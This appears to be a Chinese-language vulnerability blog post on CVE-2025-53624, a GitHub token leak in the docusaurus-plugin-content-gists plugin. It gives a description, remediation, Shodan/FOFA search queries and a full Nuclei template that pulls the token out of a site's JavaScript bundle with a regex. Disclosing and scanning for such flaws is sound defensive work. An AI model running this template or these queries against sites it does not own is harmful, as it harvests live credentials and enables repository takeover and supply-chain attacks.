docusaurus-plugin-content-gists GitHub Personal Access Token Exposure

漏洞信息

漏洞名称: docusaurus-plugin-content-gists GitHub Personal Access Token Exposure

漏洞编号:

  • CVE: CVE-2025-53624

漏洞类型: 信息泄露

漏洞等级: 高危

漏洞描述: Docusaurus-plugin-content-gists是一个为Docusaurus实例添加页面的插件,用于显示GitHub用户的公开gists。该插件在4.0.0之前的版本中存在一个信息泄露漏洞,当通过插件配置选项传递时,GitHub个人访问令牌会被无意中包含在客户端JavaScript包中,使得任何能够查看网站源代码的人都可以访问该令牌。这个令牌原本仅用于构建时的API访问。GitHub个人访问令牌的泄露可能使攻击者未经授权访问您的仓库和组织资源,导致数据泄露、代码注入和供应链攻击等安全风险。该漏洞的技术根源在于插件在处理配置选项时未能正确过滤或加密敏感信息,如个人访问令牌,从而在构建过程中将这些信息暴露给了前端。这要求所有使用该插件的用户立即升级到4.0.0或更高版本,并撤销之前使用的GitHub个人访问令牌的访问权限。

产品厂商: webbertakken

产品名称: docusaurus-plugin-content-gists

影响版本: < 4.0.0

搜索语法: http.html:”Docusaurus” || body=”Docusaurus”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f461ae7b37f2e38c2202555d3aae050f20ac1cb7/http%2Fcves%2F2025%2FCVE-2025-53624.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

id: CVE-2025-53624

info:
  name: docusaurus-plugin-content-gists < 4.0.0 - GitHub Personal Access Token Exposure
  author: darses
  severity: high
  description: |
    The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
  impact: |
    A GitHub personal access token exposure vulnerability can grant an attacker unauthorized access to your repositories and organization resources, potentially leading to data exfiltration, code injection, and supply chain attacks.
  remediation: |
    Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.
  reference:
    - https://github.com/webbertakken/docusaurus-plugin-content-gists/commit/8d4230b82412edb215ddfa9e609d178510a5fe31
    - https://github.com/webbertakken/docusaurus-plugin-content-gists/security/advisories/GHSA-qf34-qpr4-5pph
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-53624
    cwe-id: CWE-200
  metadata:
    verified: true
    vendor: webbertakken
    product: docusaurus_plugin_content_gists
    shodan-query:
      - http.html:"Docusaurus"
    fofa-query:
      - body="Docusaurus"
  tags: cve,cve2025,docusaurus,exposure

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        words:
          - 'name="generator" content="Docusaurus'
        part: body

      - type: status
        internal: true
        status:
          - 200

    extractors:
      - type: regex
        name: js_file_url
        internal: true
        group: 1
        regex:
          - '<script src="/(assets/js/main\.[^"]*\.js)"'

  - method: GET
    path:
      - "{{BaseURL}}{{js_file_url}}"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "personalAccessToken"
        part: body

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: github_token
        group: 1
        regex:
          - ',personalAccessToken:"([^"]*)"}'


Github Poc
#projectdiscovery/nuclei-templates:github issues #信息泄露
docusaurus-plugin-content-gists GitHub Personal Access Token Exposure
http://example.com/2025/07/10/github_2769661421/
作者
lianccc
发布于
2025年7月10日
许可协议